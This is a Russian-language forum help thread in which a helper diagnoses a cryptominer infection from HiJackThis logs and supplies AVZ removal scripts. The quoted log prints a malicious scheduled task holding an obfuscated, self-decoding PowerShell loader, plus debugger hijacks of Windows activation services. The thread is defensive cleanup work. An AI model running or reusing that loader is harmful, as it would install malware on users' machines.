Показано с 1 по 5 из 5.

Тормозил компьютер, Dr.Web нашёл что-то похожее на майнер (заявка № 227147)

  1. #1
    Junior Member Репутация
    Регистрация
    05.09.2021
    Сообщений
    2
    Вес репутации
    1

    Тормозил компьютер, Dr.Web нашёл что-то похожее на майнер

    У меня тормозил комп, садился с 60 до 10-15 фпс. По совету в интернете решил проверить на вирусы с помощью Dr.Web
    Нашёл товарищей на вложенных скринах. Папки указанные в программе в пути я не обнаружил, показ скрытых папок у меня включён. После удаления и лечения вроде всё прошло, но товарищи спустя время появляются обратно и комп снова тормозит.
    Изображения Изображения
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,297
    Вес репутации
    364
    Уважаемый(ая) Scarlett Wolf, спасибо за обращение на наш форум!

    Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,764
    Вес репутации
    312
    Здравствуйте,

    Не удивительно, так как вредоносное ПО обычно появляется с пиратским ПО, на сколько могу предполагать оно пришло с активатором Windows.
    Код:
    O26 - Debugger: HKLM\..\OSppSvc.exe: [Debugger] = C:\Windows\[email protected]
    O26 - Debugger: HKLM\..\SppExtComObj.exe: [Debugger] = C:\Windows\[email protected]ook.exe
    Удалите Driver Booster через установку программ в панели управления.

    HiJackThis (из каталога autologger)профиксить
    Важно: необходимо отметить и профиксить только то, что указано ниже.
    Код:
    O22 - Task: Driver Booster Scheduler - D:\Programme\Driver Booster\8.2.0\Scheduler.exe /scheduler
    O22 - Task: Driver Booster SkipUAC (User) - D:\Programme\Driver Booster\8.2.0\DriverBooster.exe /skipuac
    O22 - Task: Driver Booster Update - D:\Programme\Driver Booster\8.2.0\AutoUpdate.exe /auto
    O22 - Task: \Microsoft\Windows\Location\Location - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$DLUls='u2CiI+0v6jyLavAyriS1MqlIzRCOTb1m+HCIO6Mun2vSUd1GkxL+IZ8AjRCcHc8GhgLeHqIt9iOhPflkxSXFAuV64GrqXNxf2lKkKvw5tmT7LLdm11PSV50z8n2eFYRfph2VWLkXgyftZud4sju6M9Y1vFWxIbwwpULeR8hZpCr+OaNS9XKMYdAY/0bJTtxriCKMAJ0dkgKzSNs07Wz+df8xqGScLrNJ7T3NauccnjCfBPBc6WCRc+lijDmZUNBPzgWwKphevAKNCqARixyVSrt8/jq+a6J1imjwFKI3/D2vAZoB11TtIMthjFPpcohr00XUC5Rbr22OTc0DmwjPJZoTlQLsSvBl/yKod8Vj7Q6/O9dV8gCdFIde3GHicp1z+FzCPvtE3k7/Afhr3ES6BZoRjxHGWo8S6CTwY/B873HYVPEe63bhKMI8xyKeAvpv4VadYOhkiiyZRMJTkyfuergVmgGHFpITvQaTEv5ktyizMKJXnWbsOfBW4mKjWsBYyli7Z6cmzjbnN5JwxF6TCoYJ7SaxGYcFtVyCEs5fjxK/Oq8zs2Kodsk6zwjrPt5n5ReGHMpd0mfibZV04SHJJJB70FvUDf5jykTSVYIS3C2dBpMe8W7CWvd4+G2lPbIM/WCkXeYSnRm3SqV843GWZaQynTOXbdxCyQjWNNADgB/AI4wXmhq8TaVMtSm+ar0s0S6hVvZ1pCL4QslchhW/PaV/3GvmKsUmk1XeTp9b9muGA4wKzBKLXdNQzwP0K6R8vnjoONpv/BnvKaMprxmDXoMeriD8bIg+5TzcbZ8NlVGAO9h3mQSMHMY2hALAJYQVzWzudP9q+FjCPcsf+nL4Y6NXiBXDS7t8okWUbeN2uXHJWeNG2Qn5a4kE1FWOGY0Fi0nFBbFc7GToWOtglnO1SepytyL5AJlMzgKxSelwqmT/cZdqzlOZCoZE6GrXVJsCmFayAo8GlATcZvtkoXDqLaNu5hnCN+9iq16HFMpDrzylf5155XWFIM8L1UbeQKNVuQmaBY0VzzWBHJcS7X3CO6Bf/mqVReke+iW4Vf8BgB+NWLdg6XPVbu5rnWfJFuJazhTuY8Q5pl+7DJMTjx+zEv5t+nOyPf52iCnPCOtB6XX7HIcCjyPrfOlllSmlKNEq71PQR+kPzmCOWMBYwVjJUo8WylXqMPZ08HbnatousxD2daQmph2GBcpU7Sf3YYBo+HzcdoBt4lrOFO5jxCSMCZxWpBiNHYUe8W7CO6BM2EPAKc8I60D4dOIdjlnOArY1qGXFKahzxSDPGMJT0Qn/JshQy13aUcgt3i/aU/A0rzrzf6QhmSelCO4zvS/wV4ZMwhn6dqwgilq9XNEkwRb+VslN2HqYGYcWlR2NBYsbh1+7aL8s/2isMtF8rBWiMa49oz2MBsc//WTpZ4wh33iLcNhbn3fVEu5vjhmHFsY1lAKLCslT63vqZLY9/l7JWqQ27XbqW68LwFjEM/Nh/2HQKLdoniyZTphYmQ+2LNpSlBSEC4QNyh3cVa4r4nz/df9gg2LwBOtuqGm2V4ZfmQX9ffh2kW/rKcgonW3iWs4U7mPEPYgFgCXbTKMbj1+qOa8xtjmoatZL7QP4Z+QvokjNA5lN+2vvJNBa33iLcNhbn3fYGP8grx6KHowRjxGzSNsiy0+nL918+EeBc+0etzfjL6JTwVWDW70453HNeP5KnzzaFJgYmRL4M7EFmxi1QtsznRGAB/pN/nX7Svh3kWnvRcRQ42j9FpsFt0qlWuNGmXLpN8xXyUTYTdpIr3yZWcBKzArcLb0LkgP6ZLFP/22iUp1l2gjuZul1/y7TS6kC+m/4YdAl7WXTJptHjAGWRPl9w0vNA8Y5jRqBBaAC62bNZP5w/mCbc7VJ+XLgde5IzQPEJexr/kWfZOJ1xSDIV4oHz077fIUIkEzMCNpSnFymEutb+nLqduJ2nS+hEdBm+CvFBoUd0Q==';&('ibkLebkLx'-replace'bkL')('$d=([regex]::Matches(''pkyJpQGJocmbpJHdTdyKnQXZH5COGRVV6oTXn5Wak92YuVkL0hXZU5SblR3c5N1WngCellGKggXZptTKyVmYtVnbsFWayV2UuomYvRCIrAyJgcCIrACblR2bN5iai9GJoASKpMHbVxERkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RibkLghbkLtTbkLoLbkLeft'')|FobkLrEabkLch {$bkL_bkL.valbkLue}) -jbkLo'+'in '''';$d=[TebkLxt.EncobkLding]::UTbkLF'+2*2*2+'.GebkLtString([ConbkLvert]::Fro'+'mbkLB'+'ase'+8*8+'StribkLng($bkLd));&(''ibkLebkLx''-repbkLlace''bkL'')($d);'-replace'bkL')"
    O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\Windows\system32\cmd.exe /c dlhosts.exe || dlchosts.exe
    O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.vbs
    O22 - Task: ptpijn - C:\ProgramData\folder\VКD_J.exe /H (file missing)

    AVZ выполнить следующий скрипт.
    Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     QuarantineFile('C:\ProgramData\windows\profile\service.exe','');
     QuarantineFile('C:\ProgramData\windows\profile\dllhostn.exe','');
     QuarantineFile('C:\ProgramData\windows\dlchosts.exe','');
     QuarantineFile('C:\ProgramData\folder\VКD_J.exe','');
     QuarantineFile('C:\Windows\[email protected]','');
     DeleteFile('c:\programdata\windows\dlchosts.exe','32');
     DeleteSchedulerTask('Microsoft\Windows\Location\Location');
     DeleteFile('C:\ProgramData\windows\profile\dllhostn.exe','32');
     DeleteFile('C:\ProgramData\windows\profile\service.exe','32');
     DeleteFile('C:\ProgramData\folder\VКD_J.exe','64');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
     ExecuteWizard('SCU', 2, 3, true);
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.

    После перезагрузки:
    - Выполните в AVZ:
    Код:
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.


    • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
    • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
    • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
    • Прикрепите отчет к своему следующему сообщению.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  5. #4
    Junior Member Репутация
    Регистрация
    05.09.2021
    Сообщений
    2
    Вес репутации
    1
    А Driver Booster обязательно удалять? Я им драйвера обновлял

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,764
    Вес репутации
    312
    Цитата Сообщение от Scarlett Wolf Посмотреть сообщение
    А Driver Booster обязательно удалять? Я им драйвера обновлял
    Ну это Вам решать, для информации он является PUP (Потенциально опасный объект), это рекомендация.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

Похожие темы

  1. Ответов: 2
    Последнее сообщение: 24.04.2015, 00:57
  2. Ответов: 11
    Последнее сообщение: 28.01.2015, 19:29
  3. Ответов: 22
    Последнее сообщение: 16.03.2014, 11:28
  4. Тормозил компьютер...
    От JaneYa в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 22.02.2011, 18:29

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01281 seconds with 20 queries